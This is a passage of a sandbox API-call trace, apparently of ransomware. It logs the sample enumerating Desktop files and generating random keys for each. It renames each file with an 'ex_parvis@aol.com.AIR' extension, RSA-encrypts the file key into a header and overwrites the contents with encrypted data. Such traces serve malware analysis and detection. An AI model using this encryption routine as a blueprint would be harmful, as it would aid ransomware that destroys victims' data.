	[0099.646] FindNextFileW (in: hFindFile=0x5da4f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3108c740, ftCreationTime.dwHighDateTime=0x1d4d36a, ftLastAccessTime.dwLowDateTime=0x7e02f890, ftLastAccessTime.dwHighDateTime=0x1d4ca2d, ftLastWriteTime.dwLowDateTime=0x7e02f890, ftLastWriteTime.dwHighDateTime=0x1d4ca2d, nFileSizeHigh=0x0, nFileSizeLow=0x3a78, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_bMfn6RwnbmollBO.ppt", cAlternateFileName="_BMFN6~1.PPT")) returned 0
	[0099.646] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588de8
	[0099.646] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0099.646] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0099.646] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0099.646] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0099.646] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_bMfn6RwnbmollBO.ppt", dwFileAttributes=0x80) returned 1
	[0099.647] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_bMfn6RwnbmollBO.ppt") returned 59
	[0099.647] GetProcessHeap () returned 0x540000
	[0099.647] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xdc) returned 0x56b4c0
	[0099.647] lstrcpyW (in: lpString1=0x56b4c0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_bMfn6RwnbmollBO.ppt" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_bMfn6RwnbmollBO.ppt") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_bMfn6RwnbmollBO.ppt"
	[0099.647] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_bMfn6RwnbmollBO.ppt", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_bMfn6RwnbmollBO.ppt.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_bMfn6RwnbmollBO.ppt.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.647] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_bMfn6RwnbmollBO.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bmfn6rwnbmollbo.ppt"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_bMfn6RwnbmollBO.ppt.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bmfn6rwnbmollbo.ppt.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.649] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_bMfn6RwnbmollBO.ppt.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bmfn6rwnbmollbo.ppt.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0099.650] GetProcessHeap () returned 0x540000
	[0099.650] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56b4c0 | out: hHeap=0x540000) returned 1
	[0099.650] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=14968) returned 1
	[0099.650] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x3a78
	[0099.650] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.650] GetProcessHeap () returned 0x540000
	[0099.650] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0099.650] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.650] WriteFile (in: hFile=0x384, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.651] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.651] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.651] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x3a78) returned 0x5ffbb8
	[0099.651] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x3a78) returned 0x603638
	[0099.651] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.651] ReadFile (in: hFile=0x384, lpBuffer=0x5ffbb8, nNumberOfBytesToRead=0x3a78, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5ffbb8*, lpNumberOfBytesRead=0x3a1f778*=0x3a78, lpOverlapped=0x0) returned 1
	[0099.651] SetFilePointer (in: hFile=0x384, lDistanceToMove=-14968, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.651] WriteFile (in: hFile=0x384, lpBuffer=0x603638*, nNumberOfBytesToWrite=0x3a78, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x603638*, lpNumberOfBytesWritten=0x3a1f778*=0x3a78, lpOverlapped=0x0) returned 1
	[0099.652] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5ffbb8 | out: hHeap=0x540000) returned 1
	[0099.652] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x603638 | out: hHeap=0x540000) returned 1
	[0099.652] CloseHandle (hObject=0x384) returned 1
	[0099.652] GetProcessHeap () returned 0x540000
	[0099.652] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0099.652] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0099.652] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0099.652] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588de8 | out: hHeap=0x540000) returned 1
	[0099.652] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588e70 | out: hHeap=0x540000) returned 1
	[0099.652] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588e70
	[0099.652] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0099.652] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0099.653] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0099.653] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0099.653] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YmNdBrM5raQxjMo6.mkv", dwFileAttributes=0x80) returned 1
	[0099.653] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YmNdBrM5raQxjMo6.mkv") returned 59
	[0099.653] GetProcessHeap () returned 0x540000
	[0099.653] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xdc) returned 0x56b4c0
	[0099.653] lstrcpyW (in: lpString1=0x56b4c0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YmNdBrM5raQxjMo6.mkv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YmNdBrM5raQxjMo6.mkv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YmNdBrM5raQxjMo6.mkv"
	[0099.653] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YmNdBrM5raQxjMo6.mkv", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YmNdBrM5raQxjMo6.mkv.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YmNdBrM5raQxjMo6.mkv.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.653] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YmNdBrM5raQxjMo6.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ymndbrm5raqxjmo6.mkv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YmNdBrM5raQxjMo6.mkv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ymndbrm5raqxjmo6.mkv.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.656] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YmNdBrM5raQxjMo6.mkv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ymndbrm5raqxjmo6.mkv.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0099.656] GetProcessHeap () returned 0x540000
	[0099.656] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56b4c0 | out: hHeap=0x540000) returned 1
	[0099.656] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=26047) returned 1
	[0099.656] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x65bf
	[0099.656] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.656] GetProcessHeap () returned 0x540000
	[0099.656] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0099.656] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.657] WriteFile (in: hFile=0x384, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.657] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.657] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.658] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x65bf) returned 0x5ffbb8
	[0099.658] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x65bf) returned 0x606180
	[0099.658] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.658] ReadFile (in: hFile=0x384, lpBuffer=0x5ffbb8, nNumberOfBytesToRead=0x65bf, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5ffbb8*, lpNumberOfBytesRead=0x3a1f778*=0x65bf, lpOverlapped=0x0) returned 1
	[0099.658] SetFilePointer (in: hFile=0x384, lDistanceToMove=-26047, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.658] WriteFile (in: hFile=0x384, lpBuffer=0x606180*, nNumberOfBytesToWrite=0x65bf, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x606180*, lpNumberOfBytesWritten=0x3a1f778*=0x65bf, lpOverlapped=0x0) returned 1
	[0099.658] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5ffbb8 | out: hHeap=0x540000) returned 1
	[0099.659] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x606180 | out: hHeap=0x540000) returned 1
	[0099.660] CloseHandle (hObject=0x384) returned 1
	[0099.660] GetProcessHeap () returned 0x540000
	[0099.660] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0099.660] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0099.660] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0099.660] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588e70 | out: hHeap=0x540000) returned 1
	[0099.660] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588ef8 | out: hHeap=0x540000) returned 1
	[0099.660] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5d9568
	[0099.660] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0099.660] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0099.661] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0099.661] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0099.661] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XnNx.xls", dwFileAttributes=0x80) returned 1
	[0099.661] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XnNx.xls") returned 47
	[0099.661] GetProcessHeap () returned 0x540000
	[0099.661] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc4) returned 0x56b4c0
	[0099.661] lstrcpyW (in: lpString1=0x56b4c0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XnNx.xls" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XnNx.xls") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XnNx.xls"
	[0099.661] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XnNx.xls", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XnNx.xls.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XnNx.xls.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.661] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XnNx.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xnnx.xls"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XnNx.xls.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xnnx.xls.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.665] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XnNx.xls.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xnnx.xls.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0099.665] GetProcessHeap () returned 0x540000
	[0099.665] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56b4c0 | out: hHeap=0x540000) returned 1
	[0099.665] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=97347) returned 1
	[0099.665] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x17c43
	[0099.666] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.666] GetProcessHeap () returned 0x540000
	[0099.666] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0099.666] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.666] WriteFile (in: hFile=0x384, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.667] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.667] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.667] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x17c43) returned 0x5ffbb8
	[0099.667] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x17c43) returned 0x3790048
	[0099.668] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.668] ReadFile (in: hFile=0x384, lpBuffer=0x5ffbb8, nNumberOfBytesToRead=0x17c43, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5ffbb8*, lpNumberOfBytesRead=0x3a1f778*=0x17c43, lpOverlapped=0x0) returned 1
	[0099.670] SetFilePointer (in: hFile=0x384, lDistanceToMove=-97347, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.670] WriteFile (in: hFile=0x384, lpBuffer=0x3790048*, nNumberOfBytesToWrite=0x17c43, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3790048*, lpNumberOfBytesWritten=0x3a1f778*=0x17c43, lpOverlapped=0x0) returned 1
	[0099.670] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5ffbb8 | out: hHeap=0x540000) returned 1
	[0099.670] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x3790048 | out: hHeap=0x540000) returned 1
	[0099.670] CloseHandle (hObject=0x384) returned 1
	[0099.671] GetProcessHeap () returned 0x540000
	[0099.671] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0099.671] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0099.671] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0099.671] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d9568 | out: hHeap=0x540000) returned 1
	[0099.671] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d9500 | out: hHeap=0x540000) returned 1
	[0099.671] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x70) returned 0x5fec48
	[0099.671] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0099.671] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0099.671] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0099.671] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0099.671] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\x6M0U60Brj.xlsx", dwFileAttributes=0x80) returned 1
	[0099.672] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\x6M0U60Brj.xlsx") returned 54
	[0099.672] GetProcessHeap () returned 0x540000
	[0099.672] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd2) returned 0x56b4c0
	[0099.672] lstrcpyW (in: lpString1=0x56b4c0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\x6M0U60Brj.xlsx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\x6M0U60Brj.xlsx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\x6M0U60Brj.xlsx"
	[0099.672] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\x6M0U60Brj.xlsx", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\x6M0U60Brj.xlsx.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\x6M0U60Brj.xlsx.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.672] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\x6M0U60Brj.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\x6m0u60brj.xlsx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\x6M0U60Brj.xlsx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\x6m0u60brj.xlsx.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.675] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\x6M0U60Brj.xlsx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\x6m0u60brj.xlsx.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0099.675] GetProcessHeap () returned 0x540000
	[0099.675] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56b4c0 | out: hHeap=0x540000) returned 1
	[0099.675] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=62258) returned 1
	[0099.675] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xf332
	[0099.675] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.675] GetProcessHeap () returned 0x540000
	[0099.675] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0099.675] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.675] WriteFile (in: hFile=0x384, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.676] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.676] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.676] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf332) returned 0x5ffbb8
	[0099.676] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf332) returned 0x60eef8
	[0099.676] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.676] ReadFile (in: hFile=0x384, lpBuffer=0x5ffbb8, nNumberOfBytesToRead=0xf332, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5ffbb8*, lpNumberOfBytesRead=0x3a1f778*=0xf332, lpOverlapped=0x0) returned 1
	[0099.677] SetFilePointer (in: hFile=0x384, lDistanceToMove=-62258, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.677] WriteFile (in: hFile=0x384, lpBuffer=0x60eef8*, nNumberOfBytesToWrite=0xf332, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x60eef8*, lpNumberOfBytesWritten=0x3a1f778*=0xf332, lpOverlapped=0x0) returned 1
